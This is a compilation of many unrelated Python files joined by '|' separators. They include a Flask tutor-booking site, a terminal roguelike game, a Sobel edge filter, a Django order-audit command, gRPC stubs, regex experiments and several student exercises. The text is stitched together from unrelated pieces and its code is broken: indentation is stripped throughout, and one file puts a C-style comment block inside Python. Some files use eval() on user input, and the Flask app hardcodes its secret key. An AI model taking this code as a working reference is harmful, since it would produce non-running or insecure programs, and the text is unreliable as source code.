# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
/* To Do:
The basic plan is to take an sql dump of a postgresql database cluster and create a file for each table, reading the file for markers to show when the databases, schemas, and tables start and stop.
My current solution uses the marker text:
Cluster_name.dmp mkdir cluster_name:
SET command_name >> $clustername/set_commands.set
CREATE ROLE role_name >> $clustername/roles.role
ALTER ROLE role_name >> $clustername/roles.role
CREATE DATABASE database_name: mkdir $DATABASE:
ALTER DATABASE database_name >> $cluster_name/$DATABASE/$database_name.comment
COMMENT ON DATABASE database_name >> $DATABASE/$database_name.comment
PROCEDURAL LANGUAGE (anything related to the procedural languages in the db) >> $DATABASE/database_name.comment
CREATE SCHEMA schema_name: mkdir $DATABASE/SCHEMA:
ALTER SCHEMA schema_name >> $DATABASE/$SCHEMA/schema_name.comment
COMMENT ON SCHEMA schema_name >> $DATABASE/$SCHEMA/schema_name.comment
CREATE TYPE $SCHEMA.type_name (the detail of this is found in an sql comment '-- Name: type_name; Type: TYPE; Chema schema_name; Owner: owner;') >> $DATABASE/$SCHEMA/typename.type
ALTER TYPE $SCHEMA.type_name >> $DATABASE/$SCHEMA/typename.type
CREATE FUNCTION $SCHEMA.function_name >> $DATABASE/$SCHEMA/function_name.func
ALTER FUNCTION $SCHEMA.function_name >> $DATABASE/$SCHEMA/function_name.func
COMMENT on FUNCTION $SCHEMA.function_name >> $DATABASE/$SCHEMA/function_name.func
CREATE TABLE $SCHEMA.tablename >> $DATABASE/$SCHEMA/table_name.table
ALTER TABLE $SCHEMA.tablename >> $DATABASE/$SCHEMA/table_name.comments
*/
def main():
return 0
if __name__ == '__main__':
main()
|
# inicializa o vetor de notas com 0
notas = [0] * 5
soma = 0
#preeche vetor de notas sem usar append
for i in range(5):
notas[i] = eval(input('Digite a nota do aluno '+ str(i) +': '))
soma = soma + notas[i]
media = soma / 5
print ('A media da turma é: ', media) |
import requests
if __name__=='__main__':
for i in range(1,2048):
try:
file=open("htmls\\"+str(i)+".txt",'r')
except:
print("###"+str(i)) |
from Classes import Student
student_list = [
Student.Student("Melissa", "Atmaca"),
Student.Student("Jacob J", "Aylmer"),
Student.Student("Kayla Joy", "Batzer"),
Student.Student("Philip Joseph, III", "Brendel"),
Student.Student("Samuel Victor", "Bunis"),
Student.Student("Jacob Richard", "Buurman"),
Student.Student("Ashley N", "Cannon"),
Student.Student("Michael Christopher", "Catania"),
Student.Student("Evan Ferdinand", "Couval"),
Student.Student("Jared William", "Donnelly"),
Student.Student("Stephanie L", "Gillow"),
Student.Student("Yash", "Jalan"),
Student.Student("Zachary Michael", "Jones"),
Student.Student("Ryan Pranav", "Jonnada"),
Student.Student("Aaron David", "Kamal"),
Student.Student("Dhruv Nikhil", "Kanchi"),
Student.Student("Arjun", "Koshal"),
Student.Student("Ethan Junyan", "Li"),
Student.Student("Catherine Rose", "Maloney"),
Student.Student("Andrew Ahmet", "Ozsu"),
Student.Student("Alvin", "Radoncic")
]
|
#Leo Li
#11/16/2018
#Description: This is the sobel filter. It traces out the edge of an image and blacks out everything else
#source:http://homepages.inf.ed.ac.uk/rbf/HIPR2/sobel.htm
from PIL import Image
import sys
import math
def main():
global img,j,w
img = Image.open(sys.argv[1])#using the commandline argument to open the file
w,h = img.size
newimg = Image.new("RGB", (w,h), "white")
for j in range(1, w-1):#for every single pixel in the picture(except the corners)
for i in range(1, h-1):
Gx = 0
Gy = 0#add values of gradients to each pixel around it according to the kernel
takepixels(j-1,i-1)
Gx+=-x
Gy+=x
takepixels(j-1,i)
Gx+=-2*x
Gy+=0
takepixels(j-1,i+1)
Gx+=-x
Gy+=-x
takepixels(j,i-1)
Gx+=0
Gy+=2*x
takepixels(j,i+1)
Gx+=0
Gy+=-2*x
takepixels(j+1,i-1)
Gx+=x
Gy+=x
takepixels(j+1,i)
Gx+=2*x
Gy+=0
takepixels(j+1,i+1)
Gx+=x
Gy+=-x
l = math.sqrt(Gx**2+Gy**2)#calculate the length
l = int(l/w*255)#scale the image
newimg.putpixel((j,i),(l,l,l))
percentage()
newimg.show()
newimg.save("Image2.png", "PNG")
def takepixels(a, b):
global img,x
pixel = img.getpixel((a,b))
r = pixel[0]
g = pixel[1]
b = pixel[2]
x = r+g+b
#it shows the percentage of the program since sometimes it takes a long time for the program to process
def percentage():
p = j/w*100
print(str(p)+"%")
main() |
from spack import *
import sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import write_scram_toolfile
class Libxml2Toolfile(Package):
url = 'file://' + os.path.dirname(__file__) + '/../../common/junk.xml'
version('1.0', '68841b7dcbd130afd7d236afe8fd5b949f017615', expand=False)
depends_on('libxml2')
def install(self, spec, prefix):
values = {}
values['VER'] = spec['libxml2'].version
values['PFX'] = spec['libxml2'].prefix
fname = 'libxml2.xml'
contents = str("""<tool name="libxml2" version="$VER">
<info url="http://xmlsoft.org/"/>
<lib name="xml2"/>
<client>
<environment name="LIBXML2_BASE" default="$PFX"/>
<environment name="LIBDIR" default="$$LIBXML2_BASE/lib"/>
<environment name="INCLUDE" default="$$LIBXML2_BASE/include/libxml2"/>
</client>
<runtime name="PATH" value="$$LIBXML2_BASE/bin" type="path"/>
<runtime name="ROOT_INCLUDE_PATH" value="$$INCLUDE" type="path"/>
<use name="root_cxxdefaults"/>
</tool>
""")
write_scram_toolfile(contents, values, fname, prefix)
|
{
'name': 'Cooperation With Top Managers ',
'version': '1.0',
'category': 'E-Commerce',
'description': """
This is a general module for Cooperation With Top Managers for Project Development
""",
'author': 'Ismaylov Rufat',
'depends': ['base','project'],
'data': ['proposal_development.xml','wizard/project_task_reevaluate_view.xml','wizard/project_task_delegate_view.xml','security/acc_service_security.xml','security/ir.model.access.csv','proposal_development_workfolw.xml'],
'installable': True,
'active': True
}
|
from rest_framework import serializers
from .models import Category, Product
class CategorySerializer(serializers.ModelSerializer):
url = serializers.SerializerMethodField(read_only=True)
class Meta:
model = Category
fields = '__all__'
def get_url(self, obj):
return obj.get_absolute_url()
class ProductSerializer(serializers.ModelSerializer):
class Meta:
model = Product
fields = '__all__'
|
import pygame.mixer
sounds=pygame.mixer
sounds.init()
def wait_finish(channel):
while channel.get_busy():#get_busy()检查声音是否在被播放
pass#不做任何事情
correct_s=sounds.Sound("correct.wav")
wrong_s=sounds.Sound("wrong.wav")
prompt="1 is correct, 2 is wrong, 3 is over: "
asked_number=0
correct_number=0
wrong_number=0
choice=input(prompt)# 利用prompt作为替换
while choice!='3':
asked_number=asked_number+1
if choice=='1':
correct_number=correct_number+1
wait_finish(correct_s.play())
else:
wrong_number=wrong_number+1
wait_finish(wrong_s.play())
choice=input(prompt)
print("u have answered "+str(asked_number)+" questions")
print(str(correct_number)+" are right")
print(str(wrong_number)+" are wrong")
|
from django.contrib import admin
from .models import Room, Player
# Register your models here.
admin.site.register(Room)
admin.site.register(Player)
|
#!/usr/bin/env python3
# create dictionary of farms
farms = [{"name": "NE Farm", "agriculture": ["sheep", "cows", "pigs", "chickens", "llamas", "cats"]},
{"name": "W Farm", "agriculture": ["pigs", "chickens", "llamas"]},
{"name": "SE Farm", "agriculture": ["chickens", "carrots", "celery"]}]
nonveg = [ "sheep", "cows", "pigs", "chickens", "llamas", "cats"]
print("\nPart 1 of Challenge\n")
# loop that returns all the animals from the NE Farm!
for locations in farms:
farm_location=locations.get("name")
if farm_location == "NE Farm" :
for products in locations.get("agriculture"):
print(products)
print("\nPart 2 of Challenge\n")
# Return the plants/animals that are raised on farm requested by user
resp=9
while resp not in range(0,len(farms)) :
print("select farm from the list to get product list ")
idx = 1
for locations in farms:
print(f"{idx}",locations.get("name"))
idx += 1
resp = int(input(">>> ")) - 1
farm_chosen = farms[resp]
#print("farm_chosen")
#print(farm_chosen)
for products in farm_chosen.get("agriculture"):
print(products)
print("\nPart 3 of Challenge\n")
# Return the animals only that are raised on farm requested by user
resp=9
while resp not in range(0,len(farms)) :
print("select farm from the list to get product list ")
idx = 1
for locations in farms:
print(f"{idx}",locations.get("name"))
idx += 1
resp = int(input(">>> ")) - 1
farm_chosen = farms[resp]
#print("farm_chosen")
#print(farm_chosen)
for products in farm_chosen.get("agriculture"):
#print ("products = " + products)
for anm in nonveg :
#print ("anm = "+anm)
if products == anm :
print(products)
|
from .add_accents import * |
import os, sys, random, time, string
import input as key_input
import characters
import info
import entities
import monsters
import console
import json
# Writing JSON data
def save_settings(data):
data = ['a', 't', 'd', ',', ' ', 'up', 'down', 'left', 'right', 'q', 'i']
with open('settings.json', 'w') as f:
json.dump(data, f)
# Reading data back
def load_settings():
with open('settings.json', 'r') as f:
data = json.load(f)
return data
# the doodad that gets the keyboard input
getch = key_input._GetchUnix()
# for i in range(10):
# print(getch.__call__())
#getch.__call__()
class Game(object):
"""
Contains information about the character that the player chose, the map, and the entities within the map
"""
def __init__(self, Character, width=10, height=10, playerX=5, playerY=5):
self.player = Character
self.map = []
# entities, and entity_icons are matrices that are the same size as the map matrix,
# but they contain stuff like items and the player (the entity matrix) and the icons
# that go with them (the entity_icons matrix)
self.entities = []
self.entity_icons = []
self.info = info.Info(self.player)
self.entity_array = []
self.time = 0
# this is probably temporary code I think
for i in range(height):
self.map.append([])
self.entities.append([])
self.entity_icons.append([])
for j in range(width):
self.map[i].append(".")
if i == 0 or i == height - 1 or j == width - 1 or j == 0:
self.entities[i].append([entities.WallEntity("unbreakable", j, i)])
self.entity_icons[i].append(["#"])
else:
self.entities[i].append([])
self.entity_icons[i].append([])
self.height = len(self.map)
self.width = len(self.map[0])
self.add_entity(1, 1, self.player)
# TEST CODE PLS IGNORE
self.add_entity(5, 5, entities.Book("Super red", 5, 5))
self.add_entity(5, 5, entities.Book("Swell", 5, 5))
self.add_entity(5, 5, entities.Book("Greasy", 5, 5))
self.add_entity(4, 9, entities.Book("Plaid", 4, 9))
# self.add_entity(20, 4, monsters.Orc(20, 4))
# self.add_entity(20, 5, monsters.Monkey(20, 5))
self.add_entity(20, 6, monsters.Pig(20, 6))
self.add_entity(1, 5, entities.Chest([entities.Book("The")], "Regular"))
self.add_entity(10,10, entities.Sword("Shiny"))
self.add_entity(11,11, entities.Egg("Boiled"))
self.say("Welcome to hull breach! Watch out for hull breaches!")
self.say("""3 years ago, you retired from your job as a """ + self.player.title.lower() + """. After a period of homelessness, you find yourself working on a submarine off the coast of Siberia as a result of a brush with the Russian mafia. The submarine you work on contains experiments involving the genetic mutation of animals. Everything was going swell, until one day, after a lazy technician forgot to make his inspection of the hull, there was a breach, and now the cold Siberian sea is leaking into the submarine. Now the sub is engulfed in chaos, so it is up to you to navigate through the rooms of the submarine and find the hull breach and patch it before it's too late.""")
self.render()
def add_entity(self, xPos, yPos, entity):
self.entities[yPos][xPos].append(entity)
self.entity_icons[yPos][xPos].append(entity.icon)
self.entity_array.append(entity)
def remove_entity(self, xPos, yPos, entity):
self.entities[yPos][xPos].remove(entity)
self.entity_icons[yPos][xPos].remove(entity.icon)
self.entity_array.remove(entity)
def get_entity(self, xPos, yPos, zPos):
try:
return self.entities[yPos][xPos][zPos]
except IndexError:
return entities.NullEntity(xPos, yPos)
def get_entity_icon(self, xPos, yPos, zPos):
try:
return self.get_entity(xPos, yPos, zPos).icon
except IndexError:
return " "
def render(self):
os.system("clear")
(width, height) = console.getTerminalSize()
self.info.render()
self.info.render_dialogue()
horiz_buffer = " " * int((width - self.width) / 2)
# draws everything in the map array, and everything in the entity_icons array
for i in range(self.height):
sys.stdout.write(horiz_buffer)
for j in range(self.width):
try:
if self.entity_icons[i][j][-1] == " ":
sys.stdout.write(self.map[i][j])
elif self.entity_icons[i][j][-1] != " ":
# always uses the last item in the list for rendering
try:
sys.stdout.write(self.entity_icons[i][j][-1])
except IndexError:
pass
except IndexError:
sys.stdout.write(".")
if i == self.height - 1:
print(" " + str(self.time))
sys.stdout.write("\n")
def render_inventory(self, msg=""):
os.system("clear")
print("")
if msg != "":
print(msg)
print(" Inventory")
print("_" * 30)
print("|" + " " * 28 + "|")
for i in range(len(self.player.inventory.items)):
item_len = len("| " + str(i + 1) + ": " + self.player.inventory.items[i].description + " " + self.player.inventory.items[i].name + " |")
padding = int((32 - item_len) / 2)
print("| " + " " * padding + str(i + 1) + ": " + self.player.inventory.items[i].description + " " + self.player.inventory.items[i].name + " " * (padding - 2) + " |")
print("|" + "_" * 28 + "|")
def say(self, dialogue):
self.info.add_dialogue(dialogue)
def hull_breach(self):
os.system("clear")
print("OH NO")
time.sleep(1)
print("IT'S A...")
time.sleep(2)
print(" _ _ _ _ _ _ ____ ____ _____ _ ____ _ _ ")
print("| | | | | | | | | | | __ )| _ \| ____| / \ / ___| | | |")
print("| |_| | | | | | | | | _ \| |_) | _| / _ \| | | |_| |")
print("| _ | |_| | |___| |___ | |_) | _ <| |___ / ___ \ |___| _ |")
print("|_| |_|\___/|_____|_____| |____/|_| \_\_____/_/ \_\____|_| |_|")
for i in range(5):
time.sleep(.5)
os.system("clear")
print("OH NO")
print("IT'S A...")
time.sleep(.5)
print(" _ _ _ _ _ _ ____ ____ _____ _ ____ _ _ ")
print("| | | | | | | | | | | __ )| _ \| ____| / \ / ___| | | |")
print("| |_| | | | | | | | | _ \| |_) | _| / _ \| | | |_| |")
print("| _ | |_| | |___| |___ | |_) | _ <| |___ / ___ \ |___| _ |")
print("|_| |_|\___/|_____|_____| |____/|_| \_\_____/_/ \_\____|_| |_|")
self.tick()
def tick(self):
# checks to make sure nothing is still sticking around after is has 0 or less health
# this should probably not be here
for row in self.entities:
for col in row:
for thingy in col:
try:
if thingy.health <= 0:
#self.remove_entity(thingy.xPos, thingy.yPos, thingy)
thingy.die(self)
kill_adj = ["brutally", "efficiently", "swiftly", "messily", "violently", "cheerfully"][random.randint(0,5)]
kill_msg = ["murder", "slaughter", "destroy", "annihilate", "obliterate", "kill", "massacre"][random.randint(0,6)]
self.say("You " + kill_adj + " " + kill_msg + " the " + thingy.name)
except AttributeError:
# this occurs when the entity doesn't have any health, like a book or other item
pass
#thingy.tick(self)
for entity in self.entity_array:
entity.tick(self)
if self.player.health <= 0:
self.say("ur ded rip in piece")
self.remove_entity(self.player.xPos, self.player.yPos, self.player)
self.render()
sys.exit()
self.time += 1
if self.time % 5 == 0:
self.player.hunger -= 1
self.render()
if random.randint(1, 1000) == 1:
self.hull_breach()
def run(guy):
game = Game(guy, 70, 20, 5, 5)
guy.game = game
inv = False
# here's where the controls are defined
# arrow keys - move
# a - use/apply
# t - throw item
# d - drop item
# , - pick up
# q - quit
# i - inventory
# space - wait
while 1:
inn = getch.__call__()
if inn == "j":
game.info.scroll_back()
game.render()
elif inn == "k":
game.info.scroll_forward()
game.render()
if inn in game.player.controls.keys():
# if the function needs to not tick, make it return something
if game.player.controls[inn](game) == None:
game.tick()
else:
# print(inn)
pass
|
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import func
from forms import BookingForm, RequestForm, MsgForm
import json
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///tutors2.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = 'wqeqrfdgvytrhgfbnfdgewtfgeryvsdferwow?!'
db = SQLAlchemy(app)
from models import Tutor, Tutor_Goal, Goal, Schedule, Booking, Request, Message
@app.context_processor
def pass_goals():
week_days = {"mon": "понедельник", "tue": "вторник", "wed": "среда", "thu": "четверг", "fri": "пятница",
"sat": "суббота", "sun": "четверг"}
goals = {goal.name: [goal.ru_name, goal.icon] for goal in db.session.query(Goal).all()}
return dict(goals=goals, week_days=week_days)
@app.route('/')
def index_page():
tutors_index = {}
for tutor_row in db.session.query(Tutor).order_by(func.random()).limit(6):
tutors_index[tutor_row.id] = {'name': tutor_row.name, 'about': tutor_row.about, 'picture': tutor_row.picture,
'rating': tutor_row.rating, 'price': tutor_row.price}
return render_template('index.html', tutors_index=tutors_index)
@app.route('/goals/<goal>/')
def goal_page(goal):
query_tutor_goal = db.session.query(Tutor, Tutor_Goal, Goal).join(Tutor).join(Goal).filter(
Goal.name == goal).order_by(Tutor.rating.desc()).all()
tutors_goal = {}
for tutor_row in query_tutor_goal:
tutors_goal[tutor_row[0].id] = {'name': tutor_row[0].name, 'about': tutor_row[0].about,
'picture': tutor_row[0].picture,
'rating': tutor_row[0].rating, 'price': tutor_row[0].price}
return render_template('goal.html', tutors_goal=tutors_goal, goal=goal)
@app.route('/profiles/<int:tutor_id>/')
def tutor_profile_page(tutor_id):
tutor_row = db.session.query(Tutor).get_or_404(tutor_id)
goals_rows = db.session.query(Tutor, Tutor_Goal, Goal).join(Tutor).join(Goal).filter(Tutor.id == tutor_id).all()
schedule_rows = db.session.query(Schedule).filter(Schedule.tutor_id == tutor_id).order_by(Schedule.time).all()
list_schedule_rows = [[row.id, row.weekday, row.time, row.enabled] for row in schedule_rows]
tutor = {'id': tutor_row.id, 'name': tutor_row.name, 'about': tutor_row.about, 'picture': tutor_row.picture,
'rating': tutor_row.rating,
'price': tutor_row.price, 'goals': [goals_row[3].name for goals_row in goals_rows]}
return render_template('profile.html', tutor=tutor, timetable=list_schedule_rows)
@app.route('/sent', methods=['GET'])
def search_result_page():
return render_template('sent.html')
@app.route('/booking/<tutor_id_name>/<day_time>/<int:schedule_id>', methods=['POST', 'GET'])
def tutor_booking_page(tutor_id_name, day_time, schedule_id):
tutor_id, tutor_name = tutor_id_name.split('--')
day, time = day_time.split('--')
form_booking = BookingForm()
if form_booking.validate_on_submit():
booking_client_name = form_booking.booking_client_name.data
booking_client_tel = form_booking.booking_client_tel.data
booking_tutor_id = form_booking.booking_tutor_id.data
booking_tutor_name = form_booking.booking_tutor_name.data
booking_day = form_booking.booking_day.data
booking_time = form_booking.booking_time.data
booking_new = Booking(name=booking_client_name, phone=booking_client_tel, schedule_id=schedule_id)
db.session.add(booking_new)
db.session.commit()
return redirect(url_for('search_result_page'))
booking_data = {'tutor_id': tutor_id, 'tutor_name': tutor_name, 'day': day, 'time': time}
return render_template('booking.html', booking_data=booking_data, form_booking=form_booking)
@app.route('/message/<int:tutor_id>', methods=['POST', 'GET'])
def msg(tutor_id):
form_msg = MsgForm()
if form_msg.validate_on_submit():
msg_tutor_id = form_msg.msg_tutor_id.data
msg_client_name = form_msg.msg_client_name.data
msg_client_tel = form_msg.msg_client_tel.data
msg_text = form_msg.msg_text.data
msg_new = Message(tutor_id=msg_tutor_id, name=msg_client_name, phone=msg_client_tel, text=msg_text)
db.session.add(msg_new)
db.session.commit()
return redirect(url_for('search_result_page'))
tutor_row = db.session.query(Tutor).filter(Tutor.id == tutor_id).first()
tutor = {'id': tutor_row.id, 'name': tutor_row.name, 'picture': tutor_row.picture}
return render_template('message.html', form_msg=form_msg, tutor=tutor)
@app.route('/pick', methods=['POST', 'GET'])
def request_page():
form_request = RequestForm()
if form_request.validate_on_submit():
request_goal = int(form_request.request_goal.data)
request_client_name = form_request.request_client_name.data
request_client_tel = form_request.request_client_tel.data
request_new = Request(name=request_client_name, phone=request_client_tel, goal_id=request_goal)
db.session.add(request_new)
db.session.commit()
return redirect(url_for('search_result_page'))
return render_template('pick.html', form_request=form_request)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
|
cities = ["Karachi","Lahore","Islamabad","Quetta","Pehawar","Hyderabad","Sialkot","Gawadar","Mardan"]
del cities[8]
# print(cities[8]) index out of range error because now the list size is of 7 index
cities.remove("Gawadar")
#print(cities[7]) index out of range error because now the list size is of 6 index |
from django.apps import apps
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.db.models import Q
from django.template.defaultfilters import pluralize
from humanresources.utils import send_mail
class Command(BaseCommand):
help = "Inspect all Orders in the DB for inconsistencies."
def add_arguments(self, parser):
parser.add_argument("--responsible", type=str, nargs="+")
parser.add_argument("--notify", action="store_true")
def handle(self, *args, **options):
User = apps.get_model("auth", "User")
Order = apps.get_model("finance", "Order")
users_to_notify = []
optional_filters = Q()
if options["responsible"]:
for username in options["responsible"]:
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
raise CommandError("User '%s' not found" % username)
users_to_notify.append(user)
optional_filters.add(Q(responsible=user), Q.OR)
# apply initial filters
orders = Order.objects.filter(optional_filters)
self.stdout.write(f"Found {orders.count()} Orders")
if options["responsible"]:
self.stdout.write(
f"Found {orders.count()} Orders belonging to user{pluralize(options['responsible'])} {', '.join([repr(u) for u in options['responsible']])}"
)
orders_missing_supplier = orders.filter(supplier__isnull=True)
if orders_missing_supplier:
self.stdout.write(
self.style.WARNING(
f"{orders_missing_supplier.count()} Orders are missing a Supplier"
)
)
all_warnings = orders_missing_supplier
if all_warnings and options["responsible"] and options["notify"]:
# Send a notification email to each user with inconsistent data records
subject = "Data quality report"
for user in users_to_notify:
if not all_warnings.filter(responsible=user):
continue
orders_missing_supplier = all_warnings.filter(
responsible=user
).order_by('order_reqdate')
recipient_list = [user.email]
message_context = {
"base_url": settings.BASE_URL,
"orders_missing_supplier": orders_missing_supplier,
}
send_mail(subject, recipient_list, message_context)
self.stdout.write(self.style.SUCCESS(f"Report sent to {user.email}"))
elif all_warnings and options["responsible"] and not options["notify"]:
self.stdout.write(
"Pass the optional argument '--notify' to send an email to the users above"
)
elif all_warnings and not options["responsible"] and options["notify"]:
users_to_warn = [
User.objects.get(id=user_id)
for user_id in all_warnings.values_list("responsible", flat=True)
.distinct()
.order_by("responsible__username")
]
for user in users_to_warn:
user_orders = all_warnings.filter(responsible=user)
print(f" {user_orders.count():3d} belonging to user '{user}'")
self.stdout.write(
self.style.ERROR(
"Mass notification is disabled, please select the users you wish to notify"
)
)
self.stdout.write(
"Pass the argument '--reponsible <user1> <user2>' to send an email to the selected users"
)
else:
self.stdout.write("Nothing to report.")
|
# Copyright (c) 2017-2023 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# fmt: off
# isort: skip_file
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from . import ledger_configuration_service_pb2 as com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2
class LedgerConfigurationServiceStub(object):
"""LedgerConfigurationService allows clients to subscribe to changes of the ledger configuration.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetLedgerConfiguration = channel.unary_stream(
'/com.daml.ledger.api.v1.LedgerConfigurationService/GetLedgerConfiguration',
request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationRequest.SerializeToString,
response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationResponse.FromString,
)
class LedgerConfigurationServiceServicer(object):
"""LedgerConfigurationService allows clients to subscribe to changes of the ledger configuration.
"""
def GetLedgerConfiguration(self, request, context):
"""Returns the latest configuration as the first response, and publishes configuration updates in the same stream.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_LedgerConfigurationServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetLedgerConfiguration': grpc.unary_stream_rpc_method_handler(
servicer.GetLedgerConfiguration,
request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationRequest.FromString,
response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'com.daml.ledger.api.v1.LedgerConfigurationService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class LedgerConfigurationService(object):
"""LedgerConfigurationService allows clients to subscribe to changes of the ledger configuration.
"""
@staticmethod
def GetLedgerConfiguration(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/com.daml.ledger.api.v1.LedgerConfigurationService/GetLedgerConfiguration',
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationRequest.SerializeToString,
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_ledger__configuration__service__pb2.GetLedgerConfigurationResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
#!/usr/bin/python
def kadanes(A):
B = [A[0]]
msub = B[0]
for i in range(1, len(A)):
B.append(max(A[i], B[i - 1] + A[i]))
msub = max(msub, B[i])
return msub
# TEST CASES
print(kadanes([-2, 1, -3, 4, -1, 2, 1, -5, 4])) # 6
print(kadanes([2, 3, -1, -20, 5, 10])) # 15
|
from bs4 import BeautifulSoup
import requests
url = input("Enter the website name: ")
response = requests.get('http://' + url)
data = response.content
soup = BeautifulSoup(data, 'html5lib')
for link in soup.find_all('a'):
try:
if not link.get("href").startswith("http"):
link = 'https://' + url + link.get("href")
else:
link = link.get("href")
print(link)
except Exception as e:
continue
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 10 21:02:21 2017
@author: xueyan
"""
import re
key = r"javapythonhtmlvhdl"#这是源文本
p1 = r"python"#这是我们写的正则表达式
pattern1 = re.compile(p1)#同样是编译
matcher1 = re.search(pattern1,key)#同样是查询
print(matcher1.group(0))
p = re.compile('[a-z]+')
p.match("")
print(p.match(""))
m = p.match( 'tempo')
print(m)
m.start()
m.end()
m.span()
m.group(0)
try:
m.group(1)
except EOFError:
print('Error 1')
except:
print('Error 2')
p = re.compile('ab*')
m2 = p.match('ab123')
m2.span()
str_list = ['ab123', 'abc345', "345abc"]
store = []
for obj in str_list:
print(obj)
#print(p.match(obj).span())
s=p.match(obj)
print(s)
#print(s.span())
print(type(s))
if(s!= None): #this one works
store.append(True)
else:
store.append(False)
print(store)
type(str_list)
''' another approach -- this code seems compact than above'''
p = re.compile('ab*')
store2 = []
str_list = ['ab123', "345abc" , 'abc345']
for i, obj in enumerate(str_list):
temp_matched = p.match(obj)
if temp_matched:
store2.append(str_list[i])
print(store2)
''' ========= '''
a=2
if(a!=1):
print("Unequal")
'''
'''
[ "t"n"r"f"v]
p = re.compile('\d+')
p.findall('12 drummers drumming, 11 pipers piping, 10 lords a-leaping')
print(re.match(r'From\s+', 'Fromage amk'))
print(re.match(r'Fromage\s+', 'Fromage amk'))
print(re.match(r'From\s+', 'From amk Thu May 14 19:12:10 1998'))
p2 = re.compile(r'\d+')
p2.findall('12 drummers drumming, 11 pipers piping, 10 lords a-leaping')
m = re.match('hello', 'hello world!')
print(m.group())
p = re.compile('\d+')
print(p.split('one1two2three3four4'))
p = re.compile(r'(\w+) (\w+)')
s = 'i say, hello world!'
print(p.subn(r'\2 \1', s))
'''
Mar05, 2016-- experiment with normal expression...
'''
col_names = ['log_var1', 'Log_var1', 'var1_log', 'var2_log_abc', 'var2_log_log_abc', 'var2_log3_log_abc', 'var2_2log3_log3_log_abc']
pattern0 = re.compile('log')
print(re.match(pattern0, col_names[0])) #<_sre.SRE_Match object; span=(0, 3), match='log'>
print(re.match(pattern0, col_names[0]).group()) #log
print(re.match(pattern0, col_names[1])) #None
print(re.match(pattern0, col_names[2])) #None
print(re.match(pattern0, col_names[3])) #None
pattern0b = re.compile('log', re.I)
print(re.match(pattern0b, col_names[0])) # <_sre.SRE_Match object; span=(0, 3), match='log'>
print(re.match(pattern0b, col_names[0]).group()) #log
print(re.match(pattern0b, col_names[1])) # <_sre.SRE_Match object; span=(0, 3), match='Log'>
print(re.match(pattern0b, col_names[2])) # None
print(re.match(pattern0b, col_names[3])) # None
print(re.search(pattern0b, col_names[0])) # <_sre.SRE_Match object; span=(0, 3), match='log'>
print(re.search(pattern0b, col_names[0]).group()) # log
print(re.search(pattern0b, col_names[1])) # <_sre.SRE_Match object; span=(0, 3), match='Log'>
print(re.search(pattern0b, col_names[2])) # <_sre.SRE_Match object; span=(5, 8), match='log'>
print(re.search(pattern0b, col_names[3])) # <_sre.SRE_Match object; span=(5, 8), match='log'>
print(re.search(pattern0b, col_names[4])) # <_sre.SRE_Match object; span=(5, 8), match='log'>
print(re.findall(pattern0b, col_names[4]))
for m in re.finditer(pattern0b, col_names[4]):
print(m.group())
pattern0c = re.compile('log\d+')
pattern0d = re.compile('log\d*')
pattern0e = re.compile('\d+log\d+')
pattern0f = re.compile('\d*log\d*')
print(re.search(pattern0c, col_names[5])) #<_sre.SRE_Match object; span=(5, 9), match='log3'>
print(re.findall(pattern0c, col_names[5])) # ['log3']
print(re.search(pattern0d, col_names[5])) #<_sre.SRE_Match object; span=(5, 9), match='log3'>
print(re.findall(pattern0d, col_names[5])) # ['log3', 'log']
print(re.search(pattern0e, col_names[6])) #<_sre.SRE_Match object; span=(5, 10), match='2log3'>
print(re.findall(pattern0e, col_names[6])) #['2log3']
print(re.search(pattern0f, col_names[6]))
print(re.findall(pattern0f, col_names[6]))
pattern1 = re.compile('\Alog')
print(re.search(pattern1, col_names[0])) #<_sre.SRE_Match object; span=(0, 3), match='log'>
print(re.search(pattern1, col_names[1])) #None
print(re.search(pattern1, col_names[2])) #None
